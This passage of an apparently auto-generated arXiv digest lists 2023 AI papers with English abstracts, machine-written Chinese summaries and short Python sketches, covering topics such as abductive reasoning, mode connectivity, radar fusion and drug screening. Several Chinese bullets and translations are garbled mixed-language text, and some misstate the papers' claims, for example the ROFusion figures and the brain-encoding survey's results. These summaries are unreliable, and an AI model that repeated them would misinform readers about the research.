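    The core idea of moving away from uniform sampling can be sketched as turning a per-complexity-bin measure of performance variation into sampling probabilities. The snippet below is a simplified stand-in for the paper's trainable sampling distribution and architecture generator; the bins, the variation statistic and the temperature are all assumptions.

```python
import numpy as np

def shifted_sampling_probs(perf_variation: np.ndarray, temperature: float = 1.0) -> np.ndarray:
    """Turn per-complexity-bin performance variation into sampling probabilities.
    Bins whose subnets still vary a lot get sampled more often than under uniform sampling."""
    logits = perf_variation / temperature
    exp = np.exp(logits - logits.max())
    return exp / exp.sum()

# Toy setup: 5 FLOPs bins; uniform sampling would give each bin probability 0.2.
perf_variation = np.array([0.8, 0.3, 0.1, 0.4, 0.9])   # e.g. std of validation accuracy per bin
probs = shifted_sampling_probs(perf_variation)
print(np.round(probs, 3))

rng = np.random.default_rng(0)
sampled_bin = rng.choice(len(probs), p=probs)           # complexity bin for the next subnet
print("train a subnet from complexity bin", sampled_bin)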

Abductive Reasoning with the GPT-4 Language Model: Case studies from criminal investigation, medical practice, scientific research

  • paper_url: http://arxiv.org/abs/2307.10250
  • repo_url: None
  • paper_authors: Remo Pareschi
  • for: 这项研究评估了GPT-4大语言模型在复杂领域如医学诊断、刑事学和 cosmology 中的推理能力。
  • methods: 这项研究使用了交互式采访 Format,AI助手表现了可靠性在生成和选择假设方面。
  • results: 研究发现,GPT-4大语言模型可靠地生成和选择假设,并在医学诊断、刑事学和 cosmology 中提供了可能的医疗诊断、刑事原因和 cosmology 解释。
    Abstract This study evaluates the GPT-4 Large Language Model's abductive reasoning in complex fields like medical diagnostics, criminology, and cosmology. Using an interactive interview format, the AI assistant demonstrated reliability in generating and selecting hypotheses. It inferred plausible medical diagnoses based on patient data and provided potential causes and explanations in criminology and cosmology. The results highlight the potential of LLMs in complex problem-solving and the need for further research to maximize their practical applications.
    摘要 本研究评估了GPT-4大语言模型在医学诊断、犯罪学和宇宙学等复杂领域中的溯因推理能力。通过交互式访谈形式,该AI助手在生成和选择假设方面表现出了可靠性:它能够基于患者数据推断出合理的医学诊断,并在犯罪学和宇宙学问题中给出潜在的原因和解释。研究结果突显了大语言模型在复杂问题求解中的潜力,以及为充分发挥其实际应用价值而开展进一步研究的必要性。

Going Beyond Linear Mode Connectivity: The Layerwise Linear Feature Connectivity

  • paper_url: http://arxiv.org/abs/2307.08286
  • repo_url: None
  • paper_authors: Zhanpeng Zhou, Yongyi Yang, Xiaojiang Yang, Junchi Yan, Wei Hu
  • for: 本研究探讨了神经网络训练中复杂的损失地形和训练动态所呈现的一些新现象,其中线性模式连接(Linear Mode Connectivity,LMC)引起了广泛关注,因为它表明不同的解可以在参数空间中通过线性路径相连,同时训练和测试损失几乎保持不变。
  • methods: 本研究引入了一种更强的线性连接概念,即逐层线性特征连接(Layerwise Linear Feature Connectivity,LLFC),它表明不同训练网络中每一层的特征图也是线性连接的。研究在广泛的设定下提供了实验证据,证明当两个训练网络(通过spawning或permutation方法)满足LMC时,它们在几乎所有层上也满足LLFC。
  • results: 研究进一步探究了促成LLFC的底层因素,为spawning和permutation方法提供了新的见解;对LLFC的研究以特征学习的视角超越并推进了对LMC的理解。
    Abstract Recent work has revealed many intriguing empirical phenomena in neural network training, despite the poorly understood and highly complex loss landscapes and training dynamics. One of these phenomena, Linear Mode Connectivity (LMC), has gained considerable attention due to the intriguing observation that different solutions can be connected by a linear path in the parameter space while maintaining near-constant training and test losses. In this work, we introduce a stronger notion of linear connectivity, Layerwise Linear Feature Connectivity (LLFC), which says that the feature maps of every layer in different trained networks are also linearly connected. We provide comprehensive empirical evidence for LLFC across a wide range of settings, demonstrating that whenever two trained networks satisfy LMC (via either spawning or permutation methods), they also satisfy LLFC in nearly all the layers. Furthermore, we delve deeper into the underlying factors contributing to LLFC, which reveal new insights into the spawning and permutation approaches. The study of LLFC transcends and advances our understanding of LMC by adopting a feature-learning perspective.
    摘要 尽管神经网络的损失地形和训练动态高度复杂且尚未被充分理解,最近的研究仍揭示了训练中许多耐人寻味的经验现象。其中之一是线性模式连接(LMC):不同的解可以在参数空间中由一条线性路径相连,且沿途的训练与测试损失几乎保持不变,这一观察引起了广泛关注。在本文中,我们引入了一种更强的线性连接概念,即逐层线性特征连接(LLFC),它表明不同训练网络中每一层的特征图也是线性连接的。我们在广泛的设定下提供了充分的实验证据,表明当两个训练网络(通过spawning或permutation方法)满足LMC时,它们几乎在所有层上也满足LLFC。此外,我们深入探究了促成LLFC的底层因素,为spawning和permutation方法提供了新的认识。对LLFC的研究以特征学习的视角超越并推进了我们对LMC的理解。
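    A small sketch of how LLFC can be measured: interpolate the weights of two networks and compare each layer's features on the interpolated model with the corresponding linear mixture of the two endpoint networks' features. The toy MLPs below are randomly initialized stand-ins (two genuinely trained, weight-matched solutions would be needed to actually observe LLFC); the point is only to show the measurement.

```python
import torch
import torch.nn as nn

def make_mlp():
    return nn.Sequential(nn.Linear(20, 64), nn.ReLU(), nn.Linear(64, 64), nn.ReLU())

def interpolate(net_a, net_b, alpha):
    """Build a network whose weights are (1 - alpha) * A + alpha * B."""
    net_c = make_mlp()
    sd = {k: (1 - alpha) * net_a.state_dict()[k] + alpha * net_b.state_dict()[k]
          for k in net_a.state_dict()}
    net_c.load_state_dict(sd)
    return net_c

def features(net, x, upto):
    """Activations after the first `upto` modules of the Sequential."""
    h = x
    for layer in list(net)[:upto]:
        h = layer(h)
    return h

torch.manual_seed(0)
net_a, net_b = make_mlp(), make_mlp()
x = torch.randn(128, 20)
alpha = 0.5
net_mid = interpolate(net_a, net_b, alpha)
for depth in (2, 4):  # after the first ReLU, after the second ReLU
    f_mid = features(net_mid, x, depth)
    f_mix = (1 - alpha) * features(net_a, x, depth) + alpha * features(net_b, x, depth)
    cos = float(torch.nn.functional.cosine_similarity(f_mid.flatten(), f_mix.flatten(), dim=0))
    print(f"layer depth {depth}: cosine(interpolated features, mixed features) = {cos:.3f}")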

Deep Neural Networks and Brain Alignment: Brain Encoding and Decoding (Survey)

  • paper_url: http://arxiv.org/abs/2307.10246
  • repo_url: None
  • paper_authors: Subba Reddy Oota, Manish Gupta, Raju S. Bapi, Gael Jobard, Frederic Alexandre, Xavier Hinaut
  • for: 这个论文的目的是为了研究大脑如何表示不同的信息模式。
  • methods: 这篇论文使用了functional magnetic resonance imaging(fMRI)记录来研究大脑的记忆和语言处理。
  • results: 这篇论文提出了一些深度学习模型来解释大脑如何处理语言、视觉和听觉信息。
    Abstract How does the brain represent different modes of information? Can we design a system that automatically understands what the user is thinking? Such questions can be answered by studying brain recordings like functional magnetic resonance imaging (fMRI). As a first step, the neuroscience community has contributed several large cognitive neuroscience datasets related to passive reading/listening/viewing of concept words, narratives, pictures and movies. Encoding and decoding models using these datasets have also been proposed in the past two decades. These models serve as additional tools for basic research in cognitive science and neuroscience. Encoding models aim at generating fMRI brain representations given a stimulus automatically. They have several practical applications in evaluating and diagnosing neurological conditions and thus also help design therapies for brain damage. Decoding models solve the inverse problem of reconstructing the stimuli given the fMRI. They are useful for designing brain-machine or brain-computer interfaces. Inspired by the effectiveness of deep learning models for natural language processing, computer vision, and speech, recently several neural encoding and decoding models have been proposed. In this survey, we will first discuss popular representations of language, vision and speech stimuli, and present a summary of neuroscience datasets. Further, we will review popular deep learning based encoding and decoding architectures and note their benefits and limitations. Finally, we will conclude with a brief summary and discussion about future trends. Given the large amount of recently published work in the `computational cognitive neuroscience' community, we believe that this survey nicely organizes the plethora of work and presents it as a coherent story.
    摘要 大脑是如何表示不同模态的信息的?我们能否设计一个自动理解用户所思所想的系统?这些问题可以通过研究功能性磁共振成像(fMRI)等大脑记录来回答。作为第一步,神经科学界已经贡献了多个与被动阅读/收听/观看概念词、叙事、图片和电影相关的大型认知神经科学数据集。过去二十年中,基于这些数据集的编码和解码模型也陆续被提出,它们是认知科学和神经科学基础研究的额外工具。编码模型旨在根据给定刺激自动生成fMRI大脑表示,在评估和诊断神经系统疾病以及设计脑损伤治疗方案等方面有许多实际应用;解码模型则解决给定fMRI重建刺激的逆问题,可用于设计脑机接口。受深度学习模型在自然语言处理、计算机视觉和语音领域有效性的启发,近来已有多种神经编码和解码模型被提出。在这篇综述中,我们首先讨论语言、视觉和语音刺激的常用表示方法,并对神经科学数据集进行总结;然后回顾流行的基于深度学习的编码和解码架构,并指出其优点与局限;最后以简短的总结和对未来趋势的讨论作结。鉴于"计算认知神经科学"社区近来发表的大量工作,我们相信这篇综述能把纷繁的研究梳理成一个连贯的脉络。

Team Badminseok at IJCAI CoachAI Badminton Challenge 2023: Multi-Layer Multi-Input Transformer Network (MuLMINet) with Weighted Loss

  • paper_url: http://arxiv.org/abs/2307.08262
  • repo_url: https://github.com/stan5dard/IJCAI-CoachAI-Challenge-2023
  • paper_authors: Minwoo Seong, Jeongseok Oh, SeungJun Kim
  • for: 这个研究是为了使用人工智能技术(AI)来分析羽毛球比赛的资料,以便更好地评估策略和训练计划。
  • methods: 这个研究使用了多层多输入变数推导器网络(Multi-Layer Multi-Input Transformer Network,简称MuLMINet),利用了职业羽毛球选手比赛资料来准确地预测未来的球型和位置坐标。
  • results: 这个研究的结果是在IJCAI CoachAI Badminton Challenge 2023, Track 2中获得亚军(第二名)。此外,我们也将我们的代码公开在线上,以便对更广泛的研究社区做出贡献,并帮助进一步推动人工智能在体育分析领域的发展。
    Abstract The increasing use of artificial intelligence (AI) technology in turn-based sports, such as badminton, has sparked significant interest in evaluating strategies through the analysis of match video data. Predicting future shots based on past ones plays a vital role in coaching and strategic planning. In this study, we present a Multi-Layer Multi-Input Transformer Network (MuLMINet) that leverages professional badminton player match data to accurately predict future shot types and area coordinates. Our approach resulted in achieving the runner-up (2nd place) in the IJCAI CoachAI Badminton Challenge 2023, Track 2. To facilitate further research, we have made our code publicly accessible online, contributing to the broader research community's knowledge and advancements in the field of AI-assisted sports analysis.
    摘要 人工智能技术在回合性体育运动,如羽毛球,的应用越来越普遍,导致评估策略通过对比赛视频数据进行分析得到了广泛的关注。预测未来的击球种类和位置坐标是训练和战略规划中非常重要的一环。在这种研究中,我们介绍了一种多层多输入变换器网络(MuLMINet),利用专业羽毛球运动员的比赛数据来准确预测未来的击球种类和位置坐标。我们的方法在IJCAI CoachAI Badminton Challenge 2023年度赛事中获得了亚军(第二名),轨迹2。为了促进进一步的研究,我们在线上公开了我们的代码,对广泛的研究社区的知识和进步在人工智能辅助体育分析领域做出了贡献。

Transferable Graph Neural Fingerprint Models for Quick Response to Future Bio-Threats

  • paper_url: http://arxiv.org/abs/2308.01921
  • repo_url: None
  • paper_authors: Wei Chen, Yihui Ren, Ai Kagawa, Matthew R. Carbone, Samuel Yen-Chi Chen, Xiaohui Qu, Shinjae Yoo, Austin Clyde, Arvind Ramanathan, Rick L. Stevens, Hubertus J. J. van Dam, Deyu Liu
  • for: This paper aims to develop a high-throughput virtual screening method for COVID-19 drug discovery using graph neural fingerprints.
  • methods: The authors use a dataset of 300,000 drug candidates and 23 coronavirus protein targets to train graph neural fingerprint docking models, which show high prediction accuracy with a mean squared error of less than 0.21 kcal/mol. They also propose a transferable graph neural fingerprint method trained on multiple targets, which exhibits comparable accuracy to target-specific models with superior training and data efficiency.
  • results: The authors achieve significant improvement over conventional circular fingerprint methods in predicting docking scores, and demonstrate the transferability of their approach to unknown targets. They highlight the potential of their method for fast virtual ligand screening in the future battle against bio-threats.
    Abstract Fast screening of drug molecules based on the ligand binding affinity is an important step in the drug discovery pipeline. Graph neural fingerprint is a promising method for developing molecular docking surrogates with high throughput and great fidelity. In this study, we built a COVID-19 drug docking dataset of about 300,000 drug candidates on 23 coronavirus protein targets. With this dataset, we trained graph neural fingerprint docking models for high-throughput virtual COVID-19 drug screening. The graph neural fingerprint models yield high prediction accuracy on docking scores with the mean squared error lower than $0.21$ kcal/mol for most of the docking targets, showing significant improvement over conventional circular fingerprint methods. To make the neural fingerprints transferable for unknown targets, we also propose a transferable graph neural fingerprint method trained on multiple targets. With comparable accuracy to target-specific graph neural fingerprint models, the transferable model exhibits superb training and data efficiency. We highlight that the impact of this study extends beyond COVID-19 dataset, as our approach for fast virtual ligand screening can be easily adapted and integrated into a general machine learning-accelerated pipeline to battle future bio-threats.
    摘要 基于配体结合亲和力对药物分子进行快速筛选是药物发现流程中的重要环节。图神经指纹是一种有前景的方法,可用于构建高通量、高保真度的分子对接代理模型。在本研究中,我们针对23个冠状病毒蛋白靶点构建了包含约30万个候选药物的COVID-19药物对接数据集,并利用该数据集训练了用于高通量虚拟药物筛选的图神经指纹对接模型。在大多数对接靶点上,图神经指纹模型对对接分数的预测均方误差低于0.21 kcal/mol,显著优于传统的圆形指纹方法。为使神经指纹能够迁移到未知靶点,我们还提出了一种在多个靶点上训练的可迁移图神经指纹方法,其精度与针对单一靶点的模型相当,同时具有出色的训练和数据效率。我们强调,本研究的影响不止于COVID-19数据集:这种快速虚拟配体筛选方法可以方便地集成到通用的机器学习加速流程中,以应对未来的生物威胁。

Where Did the President Visit Last Week? Detecting Celebrity Trips from News Articles

  • paper_url: http://arxiv.org/abs/2307.08721
  • repo_url: https://github.com/zhangdatalab/celetrip
  • paper_authors: Kai Peng, Ying Zhang, Shuai Ling, Zhaoru Ke, Haipeng Zhang
  • for: 这篇论文的目的是开发一种自动检测明星行程的工具,以便进行大规模和网络化分析。
  • methods: 论文使用文本内容图模型和注意力机制来处理新闻文章中的旅行信息,并采用特殊的pooling层和节点相似性来减少不相关信息。
  • results: 论文的提出方法(CeleTrip)在比较baseline模型的测试中,实现了82.53%的F1指标。
    Abstract Celebrities' whereabouts are of pervasive importance. For instance, where politicians go, how often they visit, and who they meet, come with profound geopolitical and economic implications. Although news articles contain travel information of celebrities, it is not possible to perform large-scale and network-wise analysis due to the lack of automatic itinerary detection tools. To design such tools, we have to overcome difficulties from the heterogeneity among news articles: 1)One single article can be noisy, with irrelevant people and locations, especially when the articles are long. 2)Though it may be helpful if we consider multiple articles together to determine a particular trip, the key semantics are still scattered across different articles intertwined with various noises, making it hard to aggregate them effectively. 3)Over 20% of the articles refer to the celebrities' trips indirectly, instead of using the exact celebrity names or location names, leading to large portions of trips escaping regular detecting algorithms. We model text content across articles related to each candidate location as a graph to better associate essential information and cancel out the noises. Besides, we design a special pooling layer based on attention mechanism and node similarity, reducing irrelevant information from longer articles. To make up the missing information resulted from indirect mentions, we construct knowledge sub-graphs for named entities (person, organization, facility, etc.). Specifically, we dynamically update embeddings of event entities like the G7 summit from news descriptions since the properties (date and location) of the event change each time, which is not captured by the pre-trained event representations. The proposed CeleTrip jointly trains these modules, which outperforms all baseline models and achieves 82.53% in the F1 metric.
    摘要 celebrities的行踪具有普遍重要性。例如,政要的行程、他们多少次去过、和他们会见的人,都有深刻的地opolitical和经济意义。尽管新闻文章中包含了明星的旅行信息,但由于缺乏自动旅行计划检测工具,因此无法进行大规模的网络化分析。为了设计这些工具,我们需要超越新闻文章中的差异性:1. 一篇文章可能含有噪音,包括不相关的人和地点,特别是文章长。2. 虽然考虑多篇文章可以确定一次行程,但关键 semantics 仍然分散在不同文章中,困难于有效地聚合。3. 更 than 20% 的文章通过间接提到明星的行程,而不是使用明星名称或地点名称,导致大量行程逃逸常规检测算法。我们将文章内容相关的每个候选地点文本内容模型为一个图,以更好地关联关键信息并抑制噪音。此外,我们还设计了基于注意力机制的特殊池化层,以减少长文章中的噪音。为了补做间接提到的信息,我们构建了名实体知识图,包括人名、组织机构、设施等。具体来说,我们在新闻描述中动态更新事件实体表示,以适应每次事件的不同属性(日期和地点),这些属性不是预处理的事件表示所能捕捉。我们提出的 CeleTrip 模型jointly 训练这些模块,并超越所有基准模型,达到了 82.53% 的 F1 度量。

Lifted Sequential Planning with Lazy Constraint Generation Solvers

  • paper_url: http://arxiv.org/abs/2307.08242
  • repo_url: https://github.com/anubhav-cs/Lcg-Plan
  • paper_authors: Anubhav Singh, Miquel Ramirez, Nir Lipovetzky, Peter J. Stuckey
  • for: 这篇论文探讨了基于惰性子句生成(Lazy Clause Generation,LCG)的约束规划(CP)方法在求解序列式经典规划问题上所带来的可能性。
  • methods: 我们提出了一种新的CP模型,其基于将规划视为可满足性问题的提升式因果编码(lifted causal encodings)思想,无需实例化(grounding):为函数和动作模式选择实例化成为设计有效计划问题的一部分。该编码无需编码框架公理,也不为每个计划步骤显式地用决策变量表示状态。我们还给出了一个传播器(propagator)过程,展示了LCG拓宽"规划即(迭代)CSP求解"中可行推理方法的潜力。
  • results: 我们在经典IPC基准和最近提出的提升式规划基准上测试了该编码和传播器,发现对于所需计划步数较少的规划问题实例,我们的方法与最优序列规划的最新方法相比表现很好。
    Abstract This paper studies the possibilities made open by the use of Lazy Clause Generation (LCG) based approaches to Constraint Programming (CP) for tackling sequential classical planning. We propose a novel CP model based on seminal ideas on so-called lifted causal encodings for planning as satisfiability, that does not require grounding, as choosing groundings for functions and action schemas becomes an integral part of the problem of designing valid plans. This encoding does not require encoding frame axioms, and does not explicitly represent states as decision variables for every plan step. We also present a propagator procedure that illustrates the possibilities of LCG to widen the kind of inference methods considered to be feasible in planning as (iterated) CSP solving. We test encodings and propagators over classic IPC and recently proposed benchmarks for lifted planning, and report that for planning problem instances requiring fewer plan steps our methods compare very well with the state-of-the-art in optimal sequential planning.
    摘要

ROFusion: Efficient Object Detection using Hybrid Point-wise Radar-Optical Fusion

  • paper_url: http://arxiv.org/abs/2307.08233
  • repo_url: https://github.com/liuliu-55/rofusion
  • paper_authors: Liu Liu, Shuaifeng Zhi, Zhenhua Du, Li Liu, Xinyu Zhang, Kai Huo, Weidong Jiang
  • for: 这篇论文是针对自动驾驶和智能代理的Radar感知技术进行研究,以提高Radar感知的精度和可靠性。
  • methods: 本研究采用混合点子标准方法,融合Radar和摄像头数据,以获得多Modal特征表现。此外,本研究还提出了一个新的本地坐标表示方法,实现了对物体检测任务的对象中心坐标。
  • results: 实验结果显示,与光学图像获得信息相结合后,我们可以实现97.69%的检测精度(与最新的State-of-the-art方法FFT-RadNet的82.86% recall相比)。实验结果还显示了我们的设计选择和实现可行性。
    Abstract Radars, due to their robustness to adverse weather conditions and ability to measure object motions, have served in autonomous driving and intelligent agents for years. However, Radar-based perception suffers from its unintuitive sensing data, which lack of semantic and structural information of scenes. To tackle this problem, camera and Radar sensor fusion has been investigated as a trending strategy with low cost, high reliability and strong maintenance. While most recent works explore how to explore Radar point clouds and images, rich contextual information within Radar observation are discarded. In this paper, we propose a hybrid point-wise Radar-Optical fusion approach for object detection in autonomous driving scenarios. The framework benefits from dense contextual information from both the range-doppler spectrum and images which are integrated to learn a multi-modal feature representation. Furthermore, we propose a novel local coordinate formulation, tackling the object detection task in an object-centric coordinate. Extensive results show that with the information gained from optical images, we could achieve leading performance in object detection (97.69\% recall) compared to recent state-of-the-art methods FFT-RadNet (82.86\% recall). Ablation studies verify the key design choices and practicability of our approach given machine generated imperfect detections. The code will be available at https://github.com/LiuLiu-55/ROFusion.
    摘要 雷达凭借在恶劣天气条件下的鲁棒性以及测量物体运动的能力,多年来一直服务于自动驾驶和智能体。然而,基于雷达的感知受其不直观的传感数据所困,这些数据缺乏场景的语义和结构信息。为解决这一问题,相机与雷达传感器融合作为一种低成本、高可靠、易维护的策略受到了关注。然而,大多数最新研究着眼于如何利用雷达点云和图像,却丢弃了雷达观测中丰富的上下文信息。在本文中,我们提出了一种逐点混合的雷达-光学融合方法,用于自动驾驶场景中的目标检测。该框架受益于距离-多普勒谱和图像两者的密集上下文信息,并将其整合以学习多模态特征表示。此外,我们提出了一种新的局部坐标表示,在以目标为中心的坐标系中求解目标检测任务。大量实验结果表明,借助从光学图像获得的信息,我们的检测性能领先(召回率97.69%),优于最新的最先进方法FFT-RadNet(召回率82.86%)。消融实验验证了关键设计选择以及方法在机器生成的不完美检测下的可行性。代码将发布于 https://github.com/LiuLiu-55/ROFusion。

Harnessing Scalable Transactional Stream Processing for Managing Large Language Models [Vision]

  • paper_url: http://arxiv.org/abs/2307.08225
  • repo_url: None
  • paper_authors: Shuhao Zhang, Xianzhi Zeng, Yuhao Wu, Zhonghao Yang
  • for: 本研究旨在探讨大语言模型(LLM)在实时决策环境中的应用,以提高快速、准确、并并发响应的能力。
  • methods: 本研究提出了一种名为 TStreamLLM 的新框架,它将流处理(TSP)和 LLM 管理集成在一起,以实现高可扩展性和低延迟。
  • results: 实验结果表明,TStreamLLM 可以高效地处理连续并发的 LLM 更新和使用请求,并且可以在实时患者监测和智能交通管理等应用中提供remarkable的性能。
    Abstract Large Language Models (LLMs) have demonstrated extraordinary performance across a broad array of applications, from traditional language processing tasks to interpreting structured sequences like time-series data. Yet, their effectiveness in fast-paced, online decision-making environments requiring swift, accurate, and concurrent responses poses a significant challenge. This paper introduces TStreamLLM, a revolutionary framework integrating Transactional Stream Processing (TSP) with LLM management to achieve remarkable scalability and low latency. By harnessing the scalability, consistency, and fault tolerance inherent in TSP, TStreamLLM aims to manage continuous & concurrent LLM updates and usages efficiently. We showcase its potential through practical use cases like real-time patient monitoring and intelligent traffic management. The exploration of synergies between TSP and LLM management can stimulate groundbreaking developments in AI and database research. This paper provides a comprehensive overview of challenges and opportunities in this emerging field, setting forth a roadmap for future exploration and development.
    摘要

Towards Self-Assembling Artificial Neural Networks through Neural Developmental Programs

  • paper_url: http://arxiv.org/abs/2307.08197
  • repo_url: None
  • paper_authors: Elias Najarro, Shyam Sudhakaran, Sebastian Risi
  • for: 这个论文的目的是研究如何使用自适应的 neural network 进行自我组织和增长,以优化机器学习性能。
  • methods: 这个论文使用的方法是通过 Neural Developmental Program (NDP) 来引导 neural network 的发展和自我组织,NDP 通过本地通信来操作。
  • results: 研究发现,通过使用 NDP 来引导 neural network 的发展和自我组织,可以在不同的机器学习任务和优化方法(包括演化训练、在线 RL、离线 RL 和监督学习)中获得优化的性能。
    Abstract Biological nervous systems are created in a fundamentally different way than current artificial neural networks. Despite its impressive results in a variety of different domains, deep learning often requires considerable engineering effort to design high-performing neural architectures. By contrast, biological nervous systems are grown through a dynamic self-organizing process. In this paper, we take initial steps toward neural networks that grow through a developmental process that mirrors key properties of embryonic development in biological organisms. The growth process is guided by another neural network, which we call a Neural Developmental Program (NDP) and which operates through local communication alone. We investigate the role of neural growth on different machine learning benchmarks and different optimization methods (evolutionary training, online RL, offline RL, and supervised learning). Additionally, we highlight future research directions and opportunities enabled by having self-organization driving the growth of neural networks.
    摘要 生物神经系统的形成方式与当前的人工神经网络截然不同。尽管深度学习在众多领域取得了令人瞩目的成果,但设计高性能的神经网络结构往往需要大量的工程投入;相比之下,生物神经系统是通过动态的自组织过程生长出来的。在本文中,我们迈出了让神经网络通过模拟生物胚胎发育关键特性的发育过程进行生长的第一步。该生长过程由另一个神经网络引导,我们称之为神经发育程序(Neural Developmental Program,NDP),它仅依靠局部通信运作。我们在不同的机器学习基准和不同的优化方法(进化训练、在线强化学习、离线强化学习和监督学习)上研究了神经生长的作用,并指出了由自组织驱动神经网络生长所带来的未来研究方向和机遇。

HOPE: High-order Polynomial Expansion of Black-box Neural Networks

  • paper_url: http://arxiv.org/abs/2307.08192
  • repo_url: https://github.com/harrypotterxtx/hope
  • paper_authors: Tingxiong Xiao, Weihang Zhang, Yuxiao Cheng, Jinli Suo
  • for: 提高深度神经网络的可解释性和应用广泛性
  • methods: 使用高阶多项式扩展法拓展神经网络,计算高阶导数规则,并从导数中获得神经网络的本地解释
  • results: 提出了一种高精度、低计算复杂度、好 converges的方法,并在深度学习中应用于功能探索、快速推理和特征选择等领域
    Abstract Despite their remarkable performance, deep neural networks remain mostly ``black boxes'', suggesting inexplicability and hindering their wide applications in fields requiring making rational decisions. Here we introduce HOPE (High-order Polynomial Expansion), a method for expanding a network into a high-order Taylor polynomial on a reference input. Specifically, we derive the high-order derivative rule for composite functions and extend the rule to neural networks to obtain their high-order derivatives quickly and accurately. From these derivatives, we can then derive the Taylor polynomial of the neural network, which provides an explicit expression of the network's local interpretations. Numerical analysis confirms the high accuracy, low computational complexity, and good convergence of the proposed method. Moreover, we demonstrate HOPE's wide applications built on deep learning, including function discovery, fast inference, and feature selection. The code is available at https://github.com/HarryPotterXTX/HOPE.git.
    摘要 尽管深度神经网络表现出色,它们在很大程度上仍是"黑盒子",可解释性不足,这限制了它们在需要做出理性决策的领域中的广泛应用。在本文中,我们介绍了HOPE(高阶多项式展开)方法,它可以在参考输入处将神经网络展开为一个高阶泰勒多项式。具体而言,我们推导了复合函数的高阶求导法则,并将其推广到神经网络,从而快速而精确地获得网络的高阶导数;基于这些导数即可得到神经网络的泰勒多项式,它给出了网络局部解释的显式表达式。数值分析证实了该方法的高精度、低计算复杂度和良好的收敛性。此外,我们还展示了HOPE在深度学习中的广泛应用,包括函数发现、快速推理和特征选择。代码见 https://github.com/HarryPotterXTX/HOPE.git。
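    HOPE derives the high-order derivatives with closed-form layerwise rules rather than nested autodiff. As a rough, brute-force illustration of what the resulting local Taylor polynomial looks like, the sketch below computes the coefficients for a scalar toy "network" by repeated automatic differentiation; the toy function and all constants are made up.

```python
import torch

def taylor_coefficients(f, x0: float, order: int):
    """Coefficients c_k = f^(k)(x0) / k! via repeated autodiff (brute force; HOPE instead
    uses closed-form high-order derivative rules to get these efficiently)."""
    x = torch.tensor([x0], requires_grad=True)
    y = f(x)
    coeffs, fact, grad = [y.item()], 1.0, y
    for k in range(1, order + 1):
        grad = torch.autograd.grad(grad.sum(), x, create_graph=True)[0]
        fact *= k
        coeffs.append(grad.item() / fact)
    return coeffs

def taylor_eval(coeffs, x0, x):
    return sum(c * (x - x0) ** k for k, c in enumerate(coeffs))

# Toy "network": a tiny tanh unit acting on a scalar input.
w1, w2 = 1.3, 0.7
f = lambda x: torch.tanh(w1 * x).mul(w2).sum()

coeffs = taylor_coefficients(f, x0=0.2, order=4)
print("local Taylor coefficients:", [round(c, 4) for c in coeffs])
print("network value :", f(torch.tensor([0.25])).item())
print("polynomial    :", taylor_eval(coeffs, 0.2, 0.25))  # close near the reference input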

Mini-Giants: “Small” Language Models and Open Source Win-Win

  • paper_url: http://arxiv.org/abs/2307.08189
  • repo_url: None
  • paper_authors: Zhengping Zhou, Lezhi Li, Xinxi Chen, Andy Li
  • for: 本文主要针对小语言模型的研究和应用。
  • methods: 本文使用了开源社区如Kaggle和小语言模型的技术实现。
  • results: 本文对小语言模型进行了比较和评估,并介绍了它们在现实世界中的应用场景。
    Abstract ChatGPT is phenomenal. However, it is prohibitively expensive to train and refine such giant models. Fortunately, small language models are flourishing and becoming more and more competent. We call them "mini-giants". We argue that open source community like Kaggle and mini-giants will win-win in many ways, technically, ethically and socially. In this article, we present a brief yet rich background, discuss how to attain small language models, present a comparative study of small language models and a brief discussion of evaluation methods, discuss the application scenarios where small language models are most needed in the real world, and conclude with discussion and outlook.
    摘要 ChatGPT十分出色,但训练和打磨这类巨型模型的成本高得令人望而却步。幸运的是,小语言模型正在蓬勃发展,能力也日益增强,我们称之为"小巨人"。我们认为,Kaggle等开源社区与小巨人将在技术、伦理和社会层面上实现多方共赢。在这篇文章中,我们先给出简洁而充实的背景,讨论如何获得小语言模型,给出小语言模型的对比研究并简要讨论评估方法,探讨现实世界中最需要小语言模型的应用场景,最后以讨论与展望作结。

An Empirical Investigation of Pre-trained Model Selection for Out-of-Distribution Generalization and Calibration

  • paper_url: http://arxiv.org/abs/2307.08187
  • repo_url: None
  • paper_authors: Hiroki Naganuma, Ryuichiro Hataya
  • for: 提高out-of-distribution泛化性能和预测不确定性
  • methods: 研究预训练模型选择对finetuning中的out-of-distribution性能和预测不确定性的影响
  • results: 结果表明预训练模型选择对out-of-distribution性能有显著影响,大型模型表现较好,但需要进一步研究memorization和真正的泛化之间的平衡。
    Abstract In the realm of out-of-distribution generalization tasks, finetuning has risen as a key strategy. While the most focus has been on optimizing learning algorithms, our research highlights the influence of pre-trained model selection in finetuning on out-of-distribution performance and inference uncertainty. Balancing model size constraints of a single GPU, we examined the impact of varying pre-trained datasets and model parameters on performance metrics like accuracy and expected calibration error. Our findings underscore the significant influence of pre-trained model selection, showing marked performance improvements over algorithm choice. Larger models outperformed others, though the balance between memorization and true generalization merits further investigation. Ultimately, our research emphasizes the importance of pre-trained model selection for enhancing out-of-distribution generalization.
    摘要 在分布外(OOD)泛化任务中,微调已成为一种关键策略。虽然多数工作聚焦于优化学习算法,但我们的研究强调了微调时预训练模型的选择对分布外性能和推断不确定性的影响。在单个GPU的模型规模约束下,我们考察了不同预训练数据集和模型参数量对准确率、期望校准误差等性能指标的影响。我们的发现突出了预训练模型选择的显著影响,其带来的性能提升明显超过算法选择;较大的模型表现更好,但记忆与真正泛化之间的权衡仍有待进一步研究。总之,我们的研究强调了预训练模型选择对于提升分布外泛化的重要性。
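    Expected calibration error, one of the metrics this study reports, is the bin-weighted gap between a model's confidence and its accuracy. A standard binned sketch (bin count and the toy data are arbitrary):

```python
import numpy as np

def expected_calibration_error(confidences, correct, n_bins: int = 15) -> float:
    """Binned ECE: weighted average of |accuracy - confidence| over confidence bins."""
    confidences = np.asarray(confidences, dtype=float)
    correct = np.asarray(correct, dtype=float)
    bins = np.linspace(0.0, 1.0, n_bins + 1)
    ece = 0.0
    for lo, hi in zip(bins[:-1], bins[1:]):
        mask = (confidences > lo) & (confidences <= hi)
        if mask.any():
            gap = abs(correct[mask].mean() - confidences[mask].mean())
            ece += mask.mean() * gap       # weight by the fraction of samples in the bin
    return ece

# Toy check: an overconfident classifier has a large ECE.
rng = np.random.default_rng(0)
conf = rng.uniform(0.85, 1.0, size=1000)      # model claims ~90%+ confidence
corr = rng.uniform(size=1000) < 0.7           # but is right only ~70% of the time
print(f"ECE = {expected_calibration_error(conf, corr):.3f}")   # roughly 0.2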

Measuring Faithfulness in Chain-of-Thought Reasoning

  • paper_url: http://arxiv.org/abs/2307.13702
  • repo_url: None
